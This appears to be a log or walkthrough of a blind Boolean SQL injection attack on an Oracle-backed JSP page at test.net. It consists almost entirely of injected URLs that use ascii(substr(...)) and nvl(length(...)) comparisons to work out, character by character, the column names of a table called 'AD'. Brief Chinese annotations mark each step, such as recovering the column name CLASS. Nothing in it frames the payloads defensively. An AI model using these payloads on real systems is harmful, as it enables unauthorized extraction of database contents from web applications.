http://www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))


 以下為猜解第一列的第一個字段名CLASS的長度為:5

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 7>nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)


 以下為猜解第一列第一個字段的第一位為:C

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 68>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 66=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 66>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))


 以下為猜解第一列第一個字段的第一位為:L

http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))


 以下為猜解第一列第一個字段的第三位為:A

http://www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))


http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))


 以下為猜解第二列:

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 76>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 86=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 86>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
